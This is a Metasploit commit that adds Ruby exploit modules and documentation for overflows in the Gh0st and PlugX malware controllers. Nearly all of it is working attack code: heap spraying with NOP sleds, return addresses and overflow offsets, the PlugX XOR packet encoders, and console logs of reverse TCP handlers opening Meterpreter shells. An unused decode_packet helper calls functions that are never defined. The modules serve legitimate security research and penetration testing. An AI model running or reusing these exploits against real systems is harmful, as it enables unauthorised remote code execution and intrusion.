Land rapid7#8788 exploits for Gh0st and PlugX malware controllers

h00die · h00die · commit be66ed8af3c3 · 2017-09-05T20:42:07.000-04:00
diff --git a/documentation/modules/exploit/windows/misc/gh0st.md b/documentation/modules/exploit/windows/misc/gh0st.md
@@ -0,0 +1,42 @@
+## Vulnerable Application
+
+  This module exploits a buffer overflow in the Gh0st Controller when handling a drive list as received by a victim.
+  This vulnerability can allow remote code execution in the context of the user who ran it.
+  
+  A vulnerable version of the software is available here: [gh0st 3.6](https://github.com/rapid7/metasploit-framework/files/1243297/0efd83a87d2f5359fae051517fdf4eed8972883507fbd3b5145c3757f085d14c.zip)
+
+## Verification Steps
+
+  1. Run the application
+  2. Start msfconsole
+  3. Do: `use exploit/windows/misc/gh0st`
+  4. Do: `set rhost [ip]`
+  5. Do: `exploit`
+  6. Get a shell
+
+## Options
+
+  **MAGIC**
+  
+  This is the 5 character magic used by the server.  The default is `Gh0st`
+
+## Scenarios
+
+### Windows XP SP3 with gh0st 3.6
+
+```
+msf > use exploit/windows/misc/gh0st 
+msf exploit(gh0st) > set rhost 192.168.2.108
+rhost => 192.168.2.108
+msf exploit(gh0st) > exploit
+
+[*] Started reverse TCP handler on 1.2.3.4:4444 
+[*] 1.2.3.1:80 - Trying target Gh0st Beta 3.6
+[*] 1.2.3.1.108:80 - Spraying heap...
+[*] 1.2.3.1:80 - Trying command 103...
+[*] Sending stage (956991 bytes) to 1.2.3.1
+[*] Meterpreter session 1 opened (1.2.3.4:4444 -> 1.2.3.1:1303) at 2017-08-26 16:53:58 -0400
+[*] 1.2.3.1:80 - Server closed connection
+
+meterpreter >
+```
diff --git a/documentation/modules/exploit/windows/misc/plugx.md b/documentation/modules/exploit/windows/misc/plugx.md
@@ -0,0 +1,42 @@
+## Vulnerable Application
+
+  This module exploits a stack overflow in the Plug-X Controller when handling a larger than expected message.
+  This vulnerability can allow remote code execution however it causes a popup message to be displayed on the target before execution is gained.
+  
+  A vulnerable version of the software is available here: [PlugX type 1](https://github.com/rapid7/metasploit-framework/files/1243293/9f59a606c57217d98a5eea6846c8113aca07b203e0dcf17877b34a8b2308ade6.zip)
+
+## Verification
+
+  1. Run the application
+  2. Start msfconsole
+  3. Do: `use exploit/windows/misc/plugx`
+  4. Do: `set rhost [ip]`
+  5. Do: `set target [target]`
+  6. Do: `exploit`
+  7. Click OK for the "PeDecodePacket" pop-up on the target
+  8. Get a shell
+
+## Scenarios
+
+### Windows XP SP3 with PlugX type 1
+
+```
+msf > use exploit/windows/misc/plugx 
+msf exploit(plugx) > set rhost 1.2.3.4
+rhost => 1.2.3.4
+msf exploit(plugx) > set target 1
+target => 1
+msf exploit(plugx) > set verbose true
+verbose => true
+msf exploit(plugx) > exploit
+
+[*] Started reverse TCP handler on 1.2.3.99:4444 
+[*] 1.2.3.4:13579 - Trying target PlugX Type I...
+[*] 1.2.3.4:13579 - waiting for response
+[*] Sending stage (956991 bytes) to 1.2.3.4
+[*] Meterpreter session 1 opened (1.2.3.99:4444 -> 1.2.3.4:1975) at 2017-09-04 19:53:07 -0400
+[*] 1.2.3.4:13579 - Server closed connection
+
+meterpreter > getuid
+Server username: WINXP\user
+```
diff --git a/modules/exploits/windows/misc/gh0st.rb b/modules/exploits/windows/misc/gh0st.rb
@@ -0,0 +1,127 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'zlib'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+  include Msf::Exploit::Remote::Tcp
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Gh0st Client buffer Overflow',
+      'Description'    => %q{
+          This module exploits a Memory buffer overflow in the Gh0st client (C2 server)
+      },
+      'Author'         => 'Professor Plum',
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'thread',
+          'AllowWin32SEH' => true
+        },
+      'Payload'        =>
+        {
+          'Space'    => 1000,
+          'BadChars' => '',
+          'EncoderType' => Msf::Encoder::Type::AlphanumMixed
+        },
+      'Platform'       => 'win',
+      'DisclosureDate' => 'Jul 27 2017',
+      'Targets'        =>
+        [
+          ['Gh0st Beta 3.6', { 'Ret' => 0x06001010 }]
+        ],
+      'Privileged'     => false,
+      'DefaultTarget' => 0))
+
+    register_options(
+      [
+        OptString.new('MAGIC', [true, 'The 5 char magic used by the server', 'Gh0st']),
+        Opt::RPORT(80)
+      ]
+    )
+  end
+
+  def make_packet(id, data)
+    msg = id.chr + data
+    compressed = Zlib::Deflate.deflate(msg)
+    datastore['MAGIC'] + [13 + compressed.size].pack('V') + [msg.size].pack('V') + compressed
+  end
+
+  def validate_response(data)
+    if data.nil?
+      print_status('Server closed connection')
+      return false
+    end
+    if data.empty?
+      print_status('No response recieved')
+      return false
+    end
+    if data.size < 13
+      print_status('Invalid packet')
+      print_status(data)
+      return false
+    end
+    mag, pktlen, msglen = data[0..13].unpack('a' + datastore['MAGIC'].size.to_s + 'VV')
+    if mag.index(datastore['MAGIC']) != 0
+      print_status('Bad magic: ' + mag[0..datastore['MAGIC'].size])
+      return false
+    end
+    if pktlen != data.size
+      print_status('Packet size mismatch')
+      return false
+    end
+    msg = Zlib::Inflate.inflate(data[13..data.size])
+    if msg.size != msglen
+      print_status('Packet decompress failure')
+      return false
+    end
+    return true
+  end
+
+  def check
+    connect
+    sock.put(make_packet(101, "\x00")) # heartbeat
+    if validate_response(sock.get_once || '')
+      return Exploit::CheckCode::Appears
+    end
+    Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    print_status("Trying target #{target.name}")
+    print_status('Spraying heap...')
+    for i in 0..100
+      connect
+      sock.put(make_packet(101, "\x90" * 3 + "\x90\x83\xc0\x05" * 1024 * 1024 + payload.encoded))
+      if not validate_response(sock.get_once)
+        disconnect
+        return
+      end
+    end
+
+    for i in 103..107
+      print_status("Trying command #{i}...")
+      begin
+        connect
+        sploit = make_packet(i, "\0" * 1064 + [target['Ret'] - 0xA0].pack('V') + 'a' * 28)
+        sock.put(sploit)
+        if validate_response(sock.get_once)
+          next
+        end
+        sleep(0.1)
+        break
+      rescue EOFError
+        print_status('Invalid')
+      end
+    end
+    handler
+    disconnect
+  end
+end
diff --git a/modules/exploits/windows/misc/plugx.rb b/modules/exploits/windows/misc/plugx.rb
@@ -0,0 +1,171 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'zlib'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+  include Msf::Exploit::Remote::Tcp
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'PlugX Controller Stack Overflow',
+      'Description'    => %q{
+          This module exploits a Stack buffer overflow in the PlugX Controller (C2 server)
+      },
+      'Author'         => 'Professor Plum',
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'thread',
+          'AllowWin32SEH' => true
+        },
+      'Payload'        =>
+        {
+          'Space'    => 0xe000,
+          'BadChars' => '',
+          'EncoderType' => Msf::Encoder::Type::AlphanumMixed
+        },
+      'Platform'       => 'win',
+      'DisclosureDate' => 'Jul 27 2017',
+      'Targets'        =>
+        [
+          ['PlugX Type I (old)', { 'xor' => 0, 'callebp' => 0x004045c4 }],
+          ['PlugX Type I',         { 'xor' => 1, 'callebp' => 0x004045c4 }],
+          ['PlugX Type II',        { 'xor' => 2, 'callebp' => 0x004045c4 }]
+        ],
+      'Privileged'     => false,
+      'DefaultTarget' => 2)
+    )
+
+    register_options(
+      [
+        Opt::RPORT(13579)
+      ]
+    )
+  end
+
+  def xor_stream1(key, src)
+    key0 = key1 = key2 = key3 = key
+    dst = ''
+    for i in 0..(src.size - 1)
+      key0 = (key0 + (key0 >> 3) - 0x11111111) & 0xFFFFFFFF
+      key1 = (key1 + (key1 >> 5) - 0x22222222) & 0xFFFFFFFF
+      key2 = (key2 + 0x44444444 - (key2 << 9)) & 0xFFFFFFFF
+      key3 = (key3 + 0x33333333 - (key3 << 7)) & 0xFFFFFFFF
+      new_key = (key2 + key3 + key1 + key0) & 0xFF
+      res = src[i].ord ^ new_key
+      dst += res.chr
+    end
+    dst
+  end
+
+  def xor_stream1a(key, src)
+    key0 = key1 = key2 = key3 = key
+    dst = ''
+    for i in 0..(src.size - 1)
+      key0 = (key0 + (key0 >> 3) + 3) & 0xFFFFFFFF
+      key1 = (key1 + (key1 >> 5) + 5) & 0xFFFFFFFF
+      key2 = (key2 - 7 - (key2 << 9)) & 0xFFFFFFFF
+      key3 = (key3 - 9 - (key3 << 7)) & 0xFFFFFFFF
+      new_key = (key2 + key3 + key1 + key0) & 0xFF
+      res = src[i].ord ^ new_key
+      dst += res.chr
+    end
+    dst
+  end
+
+  def xor_stream2(key, data)
+    dst = ''
+    for i in 0..(data.size - 1)
+      key = (((key << 7) & 0xFFFFFFFF) - ((key >> 3) & 0xFFFFFFFF) + i + 0x713A8FC1) & 0xFFFFFFFF
+      dst += ((key & 0xFF) ^ ((key >> 8) & 0xFF) ^ ((key >> 16) & 0xFF) ^ data[i].ord ^ ((key >> 24) & 0xFF)).chr
+    end
+    dst
+  end
+
+  def xor_wrap(key, data)
+    if target['xor'] == 0
+      return xor_stream1a(key, data)
+    elsif target['xor'] == 1
+      return xor_stream1(key, data)
+    elsif target['xor'] == 2
+      return xor_stream2(key, data)
+    end
+    print_status('Unknown PlugX Type')
+  end
+
+  def validate_response(data)
+    if data.nil?
+      print_status('Server closed connection')
+      return false
+    end
+    if data.empty?
+      print_status('No response recieved')
+      return false
+    end
+    if data.size < 16
+      print_status('Invalid packet')
+      print_status(data.inspect)
+      return false
+    end
+    key = data[0..4].unpack('<I')[0]
+    hdr = xor_wrap(key, data[0..16])
+    _x, _flags, _cmd, comp_size, _uncomp_size, _xx = hdr.unpack('<ISSSSI')
+    if (comp_size + 16) == data.size
+      raw = xor_wrap(key, data[16..-1])
+      print_status(raw.inspect)
+      return true
+    end
+    false
+  end
+
+  def check
+    connect
+    key = rand(0xFFFFFFFF)
+    hh = [key, 0, 0, 0, 0, 0].pack('<ISSSSI')
+    hdr = xor_wrap(key, hh)
+    sock.put([key].pack('<I') + hdr[4..-1])
+    if validate_response(sock.get_once || '')
+      return Exploit::CheckCode::Appears
+    end
+    Exploit::CheckCode::Safe
+  end
+
+  def decode_packet(data)
+    key = data[0..4].unpack('<I')
+    _x, flags, _cmd, _comp_size, _uncomp_size, _xx = xorstream2(key, data[0..16]).unpack('<ISSSSI')
+
+    buf = xor_stream(key, data[16..-1])
+    buf = decompress(buf)
+    return the_flags[flags & 0xffff], xx, buf
+  end
+
+  def exploit
+    print_status("Trying target #{target.name}...")
+
+    l = 0xF008
+    pad = 0x18
+    a = 0x004045c4
+    pktlen = l + pad + 9
+    jmp = "\xe9" + [-pktlen].pack('<I')
+    key = rand(0xFFFFFFFF)
+    hh = [key, 0, 0, pktlen, pktlen, 0].pack('<ISSSSI')
+    hdr = xor_wrap(key, hh)
+    pkt = [key].pack('<I') + hdr[4..-1] + payload.encoded + 'A' * (l - payload.encoded.size) + [a].pack('<I') + 'x' * pad + jmp
+
+    connect
+    sock.put(pkt)
+
+    print_status('Waiting for response')
+    validate_response(sock.get_once)
+    disconnect
+
+    handler
+  end
+end
